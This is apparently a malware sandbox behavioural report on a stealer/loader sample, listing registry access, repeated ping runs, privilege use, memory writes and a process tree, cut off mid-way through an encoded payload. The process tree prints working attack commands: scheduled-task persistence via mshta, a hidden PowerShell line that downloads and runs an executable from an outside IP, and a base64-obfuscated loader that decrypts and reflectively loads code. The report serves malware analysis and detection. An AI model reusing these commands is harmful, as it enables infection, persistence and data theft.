\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 25e0e44750.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 389f4e0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u75a1_003.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 11864 PING.EXE 9940 PING.EXE 11516 PING.EXE 12660 PING.EXE 12768 PING.EXE 12232 PING.EXE 12272 PING.EXE 8608 PING.EXE 9772 PING.EXE 10228 PING.EXE 6008 PING.EXE 13040 PING.EXE 1780 PING.EXE 7456 PING.EXE 8328 PING.EXE 9644 PING.EXE 11280 PING.EXE 1484 PING.EXE 11216 PING.EXE 9456 PING.EXE 9856 PING.EXE 4060 PING.EXE 12704 PING.EXE 11936 PING.EXE 12556 PING.EXE 4664 PING.EXE 1552 PING.EXE 11348 PING.EXE 12320 PING.EXE 8972 PING.EXE 9024 PING.EXE 12824 PING.EXE 6620 PING.EXE 3108 PING.EXE 12368 PING.EXE 7612 PING.EXE 9812 PING.EXE 10712 PING.EXE 7932 PING.EXE 8008 PING.EXE 10004 PING.EXE 11580 PING.EXE 400 PING.EXE 3532 PING.EXE 5816 PING.EXE 8756 PING.EXE 10688 PING.EXE 10916 PING.EXE 13196 PING.EXE 11624 PING.EXE 11816 PING.EXE 12040 PING.EXE 2556 PING.EXE 6940 PING.EXE 544 PING.EXE 8504 PING.EXE 9728 PING.EXE 10480 PING.EXE 6448 PING.EXE 4256 PING.EXE 3824 PING.EXE 9500 PING.EXE 11584 PING.EXE 8140 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 4064 timeout.exe 2608 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 12040 PING.EXE 5960 PING.EXE 8436 PING.EXE 8504 PING.EXE 9456 PING.EXE 9612 PING.EXE 10860 PING.EXE 6540 PING.EXE 11884 PING.EXE 12924 PING.EXE 10872 PING.EXE 4664 PING.EXE 11668 PING.EXE 3532 PING.EXE 13108 PING.EXE 8140 PING.EXE 1912 PING.EXE 8756 PING.EXE 9500 PING.EXE 10304 PING.EXE 6212 PING.EXE 5816 PING.EXE 3824 PING.EXE 400 PING.EXE 8856 PING.EXE 9856 PING.EXE 13040 PING.EXE 11280 PING.EXE 5192 PING.EXE 6896 PING.EXE 9728 PING.EXE 11216 PING.EXE 12608 PING.EXE 8328 PING.EXE 11176 PING.EXE 6400 PING.EXE 10980 PING.EXE 12368 PING.EXE 7052 PING.EXE 9812 PING.EXE 11584 PING.EXE 1552 PING.EXE 11348 PING.EXE 12124 PING.EXE 12704 PING.EXE 7876 PING.EXE 8972 PING.EXE 9940 PING.EXE 4060 PING.EXE 8804 PING.EXE 11472 PING.EXE 12984 PING.EXE 10804 PING.EXE 7404 PING.EXE 9560 PING.EXE 9644 PING.EXE 224 PING.EXE 11160 PING.EXE 11468 PING.EXE 7612 PING.EXE 8008 PING.EXE 8552 PING.EXE 12276 PING.EXE 10536 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2444 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5408 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2944 powershell.exe 2944 powershell.exe 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 5992 rapes.exe 5992 rapes.exe 4072 Rm3cVPI.exe 4072 Rm3cVPI.exe 4072 Rm3cVPI.exe 4072 Rm3cVPI.exe 2664 149b288636.exe 2664 149b288636.exe 5408 powershell.exe 5408 powershell.exe 5408 powershell.exe 6080 powershell.exe 6080 powershell.exe 6080 powershell.exe 844 rapes.exe 844 rapes.exe 2944 dd83afce66.exe 2944 dd83afce66.exe 2944 dd83afce66.exe 2944 dd83afce66.exe 2944 dd83afce66.exe 2944 dd83afce66.exe 1044 MSBuild.exe 1044 MSBuild.exe 1044 MSBuild.exe 1044 MSBuild.exe 5948 MSBuild.exe 5948 MSBuild.exe 5948 MSBuild.exe 5948 MSBuild.exe 3136 2f5c500416.exe 3136 2f5c500416.exe 3136 2f5c500416.exe 3136 2f5c500416.exe 3136 2f5c500416.exe 3136 2f5c500416.exe 5424 MSBuild.exe 5424 MSBuild.exe 5424 MSBuild.exe 5424 MSBuild.exe 4920 MSBuild.exe 4920 MSBuild.exe 4920 MSBuild.exe 4920 MSBuild.exe 3508 80971a3226.exe 3508 80971a3226.exe 1424 Bell_Setup16.tmp 1424 Bell_Setup16.tmp 1272 regsvr32.exe 1272 regsvr32.exe 4676 powershell.exe 4676 powershell.exe 4676 powershell.exe 5784 PowerShell.exe 5784 PowerShell.exe 5784 PowerShell.exe 4340 powershell.exe 4340 powershell.exe 4340 powershell.exe 1272 regsvr32.exe -
Suspicious behavior: LoadsDriver 9 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 1424 tzutil.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe 10124 07797712.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5420 u75a1_003.exe 5420 u75a1_003.exe 5420 u75a1_003.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 5408 powershell.exe Token: SeDebugPrivilege 6080 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeIncreaseQuotaPrivilege 4676 powershell.exe Token: SeSecurityPrivilege 4676 powershell.exe Token: SeTakeOwnershipPrivilege 4676 powershell.exe Token: SeLoadDriverPrivilege 4676 powershell.exe Token: SeSystemProfilePrivilege 4676 powershell.exe Token: SeSystemtimePrivilege 4676 powershell.exe Token: SeProfSingleProcessPrivilege 4676 powershell.exe Token: SeIncBasePriorityPrivilege 4676 powershell.exe Token: SeCreatePagefilePrivilege 4676 powershell.exe Token: SeBackupPrivilege 4676 powershell.exe Token: SeRestorePrivilege 4676 powershell.exe Token: SeShutdownPrivilege 4676 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeSystemEnvironmentPrivilege 4676 powershell.exe Token: SeRemoteShutdownPrivilege 4676 powershell.exe Token: SeUndockPrivilege 4676 powershell.exe Token: SeManageVolumePrivilege 4676 powershell.exe Token: 33 4676 powershell.exe Token: 34 4676 powershell.exe Token: 35 4676 powershell.exe Token: 36 4676 powershell.exe Token: SeDebugPrivilege 5784 PowerShell.exe Token: SeIncreaseQuotaPrivilege 5784 PowerShell.exe Token: SeSecurityPrivilege 5784 PowerShell.exe Token: SeTakeOwnershipPrivilege 5784 PowerShell.exe Token: SeLoadDriverPrivilege 5784 PowerShell.exe Token: SeSystemProfilePrivilege 5784 PowerShell.exe Token: SeSystemtimePrivilege 5784 PowerShell.exe Token: SeProfSingleProcessPrivilege 5784 PowerShell.exe Token: SeIncBasePriorityPrivilege 5784 PowerShell.exe Token: SeCreatePagefilePrivilege 5784 PowerShell.exe Token: SeBackupPrivilege 5784 PowerShell.exe Token: SeRestorePrivilege 5784 PowerShell.exe Token: SeShutdownPrivilege 5784 PowerShell.exe Token: SeDebugPrivilege 5784 PowerShell.exe Token: SeSystemEnvironmentPrivilege 5784 PowerShell.exe Token: SeRemoteShutdownPrivilege 5784 PowerShell.exe Token: SeUndockPrivilege 5784 PowerShell.exe Token: SeManageVolumePrivilege 5784 PowerShell.exe Token: 33 5784 PowerShell.exe Token: 34 5784 PowerShell.exe Token: 35 5784 PowerShell.exe Token: 36 5784 PowerShell.exe Token: SeIncreaseQuotaPrivilege 5784 PowerShell.exe Token: SeSecurityPrivilege 5784 PowerShell.exe Token: SeTakeOwnershipPrivilege 5784 PowerShell.exe Token: SeLoadDriverPrivilege 5784 PowerShell.exe Token: SeSystemProfilePrivilege 5784 PowerShell.exe Token: SeSystemtimePrivilege 5784 PowerShell.exe Token: SeProfSingleProcessPrivilege 5784 PowerShell.exe Token: SeIncBasePriorityPrivilege 5784 PowerShell.exe Token: SeCreatePagefilePrivilege 5784 PowerShell.exe Token: SeBackupPrivilege 5784 PowerShell.exe Token: SeRestorePrivilege 5784 PowerShell.exe Token: SeShutdownPrivilege 5784 PowerShell.exe Token: SeDebugPrivilege 5784 PowerShell.exe Token: SeSystemEnvironmentPrivilege 5784 PowerShell.exe Token: SeRemoteShutdownPrivilege 5784 PowerShell.exe Token: SeUndockPrivilege 5784 PowerShell.exe Token: SeManageVolumePrivilege 5784 PowerShell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1564 amnew.exe 1424 Bell_Setup16.tmp -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3360 wrote to memory of 4328 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3360 wrote to memory of 4328 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3360 wrote to memory of 4328 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3360 wrote to memory of 1936 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 3360 wrote to memory of 1936 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 3360 wrote to memory of 1936 3360 2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 4328 wrote to memory of 2444 4328 cmd.exe 90 PID 4328 wrote to memory of 2444 4328 cmd.exe 90 PID 4328 wrote to memory of 2444 4328 cmd.exe 90 PID 1936 wrote to memory of 2944 1936 mshta.exe 92 PID 1936 wrote to memory of 2944 1936 mshta.exe 92 PID 1936 wrote to memory of 2944 1936 mshta.exe 92 PID 2944 wrote to memory of 3248 2944 powershell.exe 100 PID 2944 wrote to memory of 3248 2944 powershell.exe 100 PID 2944 wrote to memory of 3248 2944 powershell.exe 100 PID 3248 wrote to memory of 5992 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 101 PID 3248 wrote to memory of 5992 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 101 PID 3248 wrote to memory of 5992 3248 TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE 101 PID 5992 wrote to memory of 4072 5992 rapes.exe 105 PID 5992 wrote to memory of 4072 5992 rapes.exe 105 PID 5992 wrote to memory of 4072 5992 rapes.exe 105 PID 5992 wrote to memory of 2664 5992 rapes.exe 106 PID 5992 wrote to memory of 2664 5992 rapes.exe 106 PID 5992 wrote to memory of 2664 5992 rapes.exe 106 PID 5992 wrote to memory of 2004 5992 rapes.exe 107 PID 5992 wrote to memory of 2004 5992 rapes.exe 107 PID 5992 wrote to memory of 2004 5992 rapes.exe 107 PID 2004 wrote to memory of 412 2004 cmd.exe 109 PID 2004 wrote to memory of 412 2004 cmd.exe 109 PID 2004 wrote to memory of 412 2004 cmd.exe 109 PID 412 wrote to memory of 5408 412 cmd.exe 111 PID 412 wrote to memory of 5408 412 cmd.exe 111 PID 412 wrote to memory of 5408 412 cmd.exe 111 PID 5408 wrote to memory of 6080 5408 powershell.exe 112 PID 5408 wrote to memory of 6080 5408 powershell.exe 112 PID 5408 wrote to memory of 6080 5408 powershell.exe 112 PID 5992 wrote to memory of 220 5992 rapes.exe 115 PID 5992 wrote to memory of 220 5992 rapes.exe 115 PID 5992 wrote to memory of 220 5992 rapes.exe 115 PID 220 wrote to memory of 2624 220 25e0e44750.exe 116 PID 220 wrote to memory of 2624 220 25e0e44750.exe 116 PID 220 wrote to memory of 2624 220 25e0e44750.exe 116 PID 2624 wrote to memory of 4508 2624 221.exe 118 PID 2624 wrote to memory of 4508 2624 221.exe 118 PID 4508 wrote to memory of 5912 4508 cmd.exe 121 PID 4508 wrote to memory of 5912 4508 cmd.exe 121 PID 4508 wrote to memory of 5912 4508 cmd.exe 121 PID 5912 wrote to memory of 5300 5912 221.exe 122 PID 5912 wrote to memory of 5300 5912 221.exe 122 PID 5300 wrote to memory of 4560 5300 cmd.exe 124 PID 5300 wrote to memory of 4560 5300 cmd.exe 124 PID 5300 wrote to memory of 5472 5300 cmd.exe 125 PID 5300 wrote to memory of 5472 5300 cmd.exe 125 PID 5300 wrote to memory of 4064 5300 cmd.exe 126 PID 5300 wrote to memory of 4064 5300 cmd.exe 126 PID 5300 wrote to memory of 2036 5300 cmd.exe 127 PID 5300 wrote to memory of 2036 5300 cmd.exe 127 PID 5300 wrote to memory of 756 5300 cmd.exe 128 PID 5300 wrote to memory of 756 5300 cmd.exe 128 PID 5300 wrote to memory of 1552 5300 cmd.exe 129 PID 5300 wrote to memory of 1552 5300 cmd.exe 129 PID 5300 wrote to memory of 2440 5300 cmd.exe 130 PID 5300 wrote to memory of 2440 5300 cmd.exe 130 PID 5300 wrote to memory of 5308 5300 cmd.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 40qccmaDpG0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 40qccmaDpG0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2444
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\NzEdGm0aG.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE"C:\Users\Admin\AppData\Local\TempA4KMBX1XLYO7BBHNMMQLPUEIKD8FCXNV.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5992 -
C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4072
-
-
C:\Users\Admin\AppData\Local\Temp\10362200101\149b288636.exe"C:\Users\Admin\AppData\Local\Temp\10362200101\149b288636.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JG